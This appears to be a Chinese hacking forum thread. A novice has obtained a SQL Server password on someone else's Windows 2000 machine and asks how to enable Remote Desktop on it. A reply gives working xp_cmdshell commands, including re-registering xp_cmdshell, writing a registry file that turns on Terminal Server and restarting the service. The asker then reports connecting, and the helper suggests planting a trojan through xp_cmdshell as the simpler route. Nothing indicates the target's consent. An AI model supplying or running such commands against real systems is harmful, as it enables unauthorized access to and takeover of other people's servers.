如何开3389啊 如何, sql

业余人

我用WINNTAutoAttack扫到sql口令
  但没开3389  怎样在WINNTAutoAttack上的sqlcmd上开启3389啊
求助啊

业余人

补充  看了他的c盘 没有Documents and Settings

柔肠寸断

不同的系统有不同的方法。。

saitojie

能使用基于SQL的shell吗？也就是大家熟悉的"xp_cmdshell"，如果不能使用，尝试下exec sp_addextendedproc 'xp_cmdshell','xplog70.dll'看看能不能恢复，如果可以，再尝试使用这个shell编写一个批处理，直接对注册表进行操作，然后开启对方的3389。

业余人

有那个sql的shell 对方是win2000server
  你能不能说的详细点阿   谢了
    我是菜鸟啊

saitojie

我记不得太多了，因为现在手里的不是XP就是2003的系统，所以只能按照自己的模糊的记忆给你点提示了，不保证完全成功，你可以试试！
分别执行
命令一:

1. exec [master].[dbo].[xp_cmdshell] 'cd \ && c: && echo Windows Registry Editor Version 5.00 > 1.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> 1.reg && echo "ShutdownWithoutLogon"="0" >> 1.reg && echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >> 1.reg && echo "EnableAdminTSRemote"=dword:00000001 >> 1.reg && echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> 1.reg && echo "TSEnabled"=dword:00000001 >> 1.reg && echo[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 1.reg && echo "PortNumber"=dword:00000D3D >> 1.reg'

复制代码

命令二:

1. exec [master].[dbo].[xp_cmdshell] 'regedit /s c:\1.reg && net stop "Terminal Server" && net start "Terminal Server"'

复制代码

给你写了两条命令，这两条命令全部是在SQL的shell里面使用的，由于写的比较急，可能还存在问题吧，你可以试试！

业余人

哦 非常谢谢

业余人

我连了 可问题又来了 我输入正确的用户名密码后 提示用户名或密码错误
  对方是内网   不知道和这个有没有关系

saitojie

还提醒你一下，既然你都能执行xp_cmdshell了，为什么你还要去开别人的3389，还要去想办法主动连接别人，你就不能直接弄个马上去，使用xp_cmdshell执行了搞定吗？
何必这么麻烦！？